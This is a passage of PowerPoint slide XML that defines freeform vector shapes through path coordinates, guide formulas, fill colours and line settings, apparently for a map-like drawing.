                      <a:pt x="38" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="140"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="75" y="133"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="75" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="133"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="129" y="122"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="125" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="122"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="62" y="105"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="59" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="105"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36289" name="Freeform 21"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4638" y="2644"/>
                <a:ext cx="66" cy="94"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10 w 66"/>
                  <a:gd name="T1" fmla="*/ 66 h 94"/>
                  <a:gd name="T2" fmla="*/ 2 w 66"/>
                  <a:gd name="T3" fmla="*/ 52 h 94"/>
                  <a:gd name="T4" fmla="*/ 2 w 66"/>
                  <a:gd name="T5" fmla="*/ 43 h 94"/>
                  <a:gd name="T6" fmla="*/ 1 w 66"/>
                  <a:gd name="T7" fmla="*/ 37 h 94"/>
                  <a:gd name="T8" fmla="*/ 10 w 66"/>
                  <a:gd name="T9" fmla="*/ 39 h 94"/>
                  <a:gd name="T10" fmla="*/ 9 w 66"/>
                  <a:gd name="T11" fmla="*/ 33 h 94"/>
                  <a:gd name="T12" fmla="*/ 10 w 66"/>
                  <a:gd name="T13" fmla="*/ 25 h 94"/>
                  <a:gd name="T14" fmla="*/ 11 w 66"/>
                  <a:gd name="T15" fmla="*/ 14 h 94"/>
                  <a:gd name="T16" fmla="*/ 14 w 66"/>
                  <a:gd name="T17" fmla="*/ 3 h 94"/>
                  <a:gd name="T18" fmla="*/ 18 w 66"/>
                  <a:gd name="T19" fmla="*/ 0 h 94"/>
                  <a:gd name="T20" fmla="*/ 30 w 66"/>
                  <a:gd name="T21" fmla="*/ 5 h 94"/>
                  <a:gd name="T22" fmla="*/ 36 w 66"/>
                  <a:gd name="T23" fmla="*/ 4 h 94"/>
                  <a:gd name="T24" fmla="*/ 39 w 66"/>
                  <a:gd name="T25" fmla="*/ 3 h 94"/>
                  <a:gd name="T26" fmla="*/ 37 w 66"/>
                  <a:gd name="T27" fmla="*/ 10 h 94"/>
                  <a:gd name="T28" fmla="*/ 38 w 66"/>
                  <a:gd name="T29" fmla="*/ 19 h 94"/>
                  <a:gd name="T30" fmla="*/ 43 w 66"/>
                  <a:gd name="T31" fmla="*/ 24 h 94"/>
                  <a:gd name="T32" fmla="*/ 38 w 66"/>
                  <a:gd name="T33" fmla="*/ 37 h 94"/>
                  <a:gd name="T34" fmla="*/ 28 w 66"/>
                  <a:gd name="T35" fmla="*/ 44 h 94"/>
                  <a:gd name="T36" fmla="*/ 27 w 66"/>
                  <a:gd name="T37" fmla="*/ 47 h 94"/>
                  <a:gd name="T38" fmla="*/ 25 w 66"/>
                  <a:gd name="T39" fmla="*/ 54 h 94"/>
                  <a:gd name="T40" fmla="*/ 28 w 66"/>
                  <a:gd name="T41" fmla="*/ 61 h 94"/>
                  <a:gd name="T42" fmla="*/ 33 w 66"/>
                  <a:gd name="T43" fmla="*/ 74 h 94"/>
                  <a:gd name="T44" fmla="*/ 36 w 66"/>
                  <a:gd name="T45" fmla="*/ 76 h 94"/>
                  <a:gd name="T46" fmla="*/ 40 w 66"/>
                  <a:gd name="T47" fmla="*/ 75 h 94"/>
                  <a:gd name="T48" fmla="*/ 45 w 66"/>
                  <a:gd name="T49" fmla="*/ 70 h 94"/>
                  <a:gd name="T50" fmla="*/ 49 w 66"/>
                  <a:gd name="T51" fmla="*/ 73 h 94"/>
                  <a:gd name="T52" fmla="*/ 52 w 66"/>
                  <a:gd name="T53" fmla="*/ 80 h 94"/>
                  <a:gd name="T54" fmla="*/ 58 w 66"/>
                  <a:gd name="T55" fmla="*/ 76 h 94"/>
                  <a:gd name="T56" fmla="*/ 64 w 66"/>
                  <a:gd name="T57" fmla="*/ 79 h 94"/>
                  <a:gd name="T58" fmla="*/ 63 w 66"/>
                  <a:gd name="T59" fmla="*/ 81 h 94"/>
                  <a:gd name="T60" fmla="*/ 59 w 66"/>
                  <a:gd name="T61" fmla="*/ 83 h 94"/>
                  <a:gd name="T62" fmla="*/ 63 w 66"/>
                  <a:gd name="T63" fmla="*/ 94 h 94"/>
                  <a:gd name="T64" fmla="*/ 56 w 66"/>
                  <a:gd name="T65" fmla="*/ 92 h 94"/>
                  <a:gd name="T66" fmla="*/ 54 w 66"/>
                  <a:gd name="T67" fmla="*/ 86 h 94"/>
                  <a:gd name="T68" fmla="*/ 45 w 66"/>
                  <a:gd name="T69" fmla="*/ 78 h 94"/>
                  <a:gd name="T70" fmla="*/ 42 w 66"/>
                  <a:gd name="T71" fmla="*/ 79 h 94"/>
                  <a:gd name="T72" fmla="*/ 43 w 66"/>
                  <a:gd name="T73" fmla="*/ 87 h 94"/>
                  <a:gd name="T74" fmla="*/ 31 w 66"/>
                  <a:gd name="T75" fmla="*/ 77 h 94"/>
                  <a:gd name="T76" fmla="*/ 26 w 66"/>
                  <a:gd name="T77" fmla="*/ 78 h 94"/>
                  <a:gd name="T78" fmla="*/ 24 w 66"/>
                  <a:gd name="T79" fmla="*/ 81 h 94"/>
                  <a:gd name="T80" fmla="*/ 19 w 66"/>
                  <a:gd name="T81" fmla="*/ 80 h 94"/>
                  <a:gd name="T82" fmla="*/ 13 w 66"/>
                  <a:gd name="T83" fmla="*/ 74 h 94"/>
                  <a:gd name="T84" fmla="*/ 20 w 66"/>
                  <a:gd name="T85" fmla="*/ 71 h 94"/>
                  <a:gd name="T86" fmla="*/ 26 w 66"/>
                  <a:gd name="T87" fmla="*/ 70 h 94"/>
                  <a:gd name="T88" fmla="*/ 19 w 66"/>
                  <a:gd name="T89" fmla="*/ 67 h 94"/>
                  <a:gd name="T90" fmla="*/ 13 w 66"/>
                  <a:gd name="T91" fmla="*/ 62 h 94"/>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66"/>
                  <a:gd name="T139" fmla="*/ 0 h 94"/>
                  <a:gd name="T140" fmla="*/ 66 w 66"/>
                  <a:gd name="T141" fmla="*/ 94 h 94"/>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66" h="94">
                    <a:moveTo>
                      <a:pt x="11" y="67"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="10" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="67"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36290" name="Freeform 22"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4672" y="2788"/>
                <a:ext cx="72" cy="69"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 66 w 72"/>
                  <a:gd name="T1" fmla="*/ 50 h 69"/>
                  <a:gd name="T2" fmla="*/ 62 w 72"/>
                  <a:gd name="T3" fmla="*/ 41 h 69"/>
                  <a:gd name="T4" fmla="*/ 57 w 72"/>
                  <a:gd name="T5" fmla="*/ 45 h 69"/>
                  <a:gd name="T6" fmla="*/ 57 w 72"/>
                  <a:gd name="T7" fmla="*/ 54 h 69"/>
                  <a:gd name="T8" fmla="*/ 59 w 72"/>
                  <a:gd name="T9" fmla="*/ 61 h 69"/>
                  <a:gd name="T10" fmla="*/ 55 w 72"/>
                  <a:gd name="T11" fmla="*/ 69 h 69"/>
                  <a:gd name="T12" fmla="*/ 51 w 72"/>
                  <a:gd name="T13" fmla="*/ 65 h 69"/>
                  <a:gd name="T14" fmla="*/ 52 w 72"/>
                  <a:gd name="T15" fmla="*/ 60 h 69"/>
                  <a:gd name="T16" fmla="*/ 47 w 72"/>
                  <a:gd name="T17" fmla="*/ 64 h 69"/>
                  <a:gd name="T18" fmla="*/ 38 w 72"/>
                  <a:gd name="T19" fmla="*/ 59 h 69"/>
                  <a:gd name="T20" fmla="*/ 33 w 72"/>
                  <a:gd name="T21" fmla="*/ 51 h 69"/>
                  <a:gd name="T22" fmla="*/ 36 w 72"/>
                  <a:gd name="T23" fmla="*/ 40 h 69"/>
                  <a:gd name="T24" fmla="*/ 32 w 72"/>
                  <a:gd name="T25" fmla="*/ 34 h 69"/>
                  <a:gd name="T26" fmla="*/ 24 w 72"/>
                  <a:gd name="T27" fmla="*/ 32 h 69"/>
                  <a:gd name="T28" fmla="*/ 23 w 72"/>
                  <a:gd name="T29" fmla="*/ 35 h 69"/>
                  <a:gd name="T30" fmla="*/ 14 w 72"/>
                  <a:gd name="T31" fmla="*/ 37 h 69"/>
                  <a:gd name="T32" fmla="*/ 13 w 72"/>
                  <a:gd name="T33" fmla="*/ 32 h 69"/>
                  <a:gd name="T34" fmla="*/ 6 w 72"/>
                  <a:gd name="T35" fmla="*/ 40 h 69"/>
                  <a:gd name="T36" fmla="*/ 1 w 72"/>
                  <a:gd name="T37" fmla="*/ 46 h 69"/>
                  <a:gd name="T38" fmla="*/ 0 w 72"/>
                  <a:gd name="T39" fmla="*/ 44 h 69"/>
                  <a:gd name="T40" fmla="*/ 3 w 72"/>
                  <a:gd name="T41" fmla="*/ 36 h 69"/>
                  <a:gd name="T42" fmla="*/ 6 w 72"/>
                  <a:gd name="T43" fmla="*/ 30 h 69"/>
                  <a:gd name="T44" fmla="*/ 13 w 72"/>
                  <a:gd name="T45" fmla="*/ 28 h 69"/>
                  <a:gd name="T46" fmla="*/ 15 w 72"/>
                  <a:gd name="T47" fmla="*/ 24 h 69"/>
                  <a:gd name="T48" fmla="*/ 21 w 72"/>
                  <a:gd name="T49" fmla="*/ 21 h 69"/>
                  <a:gd name="T50" fmla="*/ 28 w 72"/>
                  <a:gd name="T51" fmla="*/ 23 h 69"/>
                  <a:gd name="T52" fmla="*/ 31 w 72"/>
                  <a:gd name="T53" fmla="*/ 27 h 69"/>
                  <a:gd name="T54" fmla="*/ 36 w 72"/>
                  <a:gd name="T55" fmla="*/ 25 h 69"/>
                  <a:gd name="T56" fmla="*/ 40 w 72"/>
                  <a:gd name="T57" fmla="*/ 19 h 69"/>
                  <a:gd name="T58" fmla="*/ 45 w 72"/>
                  <a:gd name="T59" fmla="*/ 22 h 69"/>
                  <a:gd name="T60" fmla="*/ 48 w 72"/>
                  <a:gd name="T61" fmla="*/ 14 h 69"/>
                  <a:gd name="T62" fmla="*/ 52 w 72"/>
                  <a:gd name="T63" fmla="*/ 14 h 69"/>
                  <a:gd name="T64" fmla="*/ 57 w 72"/>
                  <a:gd name="T65" fmla="*/ 13 h 69"/>
                  <a:gd name="T66" fmla="*/ 57 w 72"/>
                  <a:gd name="T67" fmla="*/ 7 h 69"/>
                  <a:gd name="T68" fmla="*/ 57 w 72"/>
                  <a:gd name="T69" fmla="*/ 0 h 69"/>
                  <a:gd name="T70" fmla="*/ 65 w 72"/>
                  <a:gd name="T71" fmla="*/ 10 h 69"/>
                  <a:gd name="T72" fmla="*/ 68 w 72"/>
                  <a:gd name="T73" fmla="*/ 15 h 69"/>
                  <a:gd name="T74" fmla="*/ 67 w 72"/>
                  <a:gd name="T75" fmla="*/ 22 h 69"/>
                  <a:gd name="T76" fmla="*/ 71 w 72"/>
                  <a:gd name="T77" fmla="*/ 25 h 69"/>
                  <a:gd name="T78" fmla="*/ 71 w 72"/>
                  <a:gd name="T79" fmla="*/ 33 h 69"/>
                  <a:gd name="T80" fmla="*/ 72 w 72"/>
                  <a:gd name="T81" fmla="*/ 39 h 69"/>
                  <a:gd name="T82" fmla="*/ 70 w 72"/>
                  <a:gd name="T83" fmla="*/ 46 h 69"/>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72"/>
                  <a:gd name="T127" fmla="*/ 0 h 69"/>
                  <a:gd name="T128" fmla="*/ 72 w 72"/>
                  <a:gd name="T129" fmla="*/ 69 h 69"/>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72" h="69">
                    <a:moveTo>
                      <a:pt x="67" y="51"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="66" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="22"/>
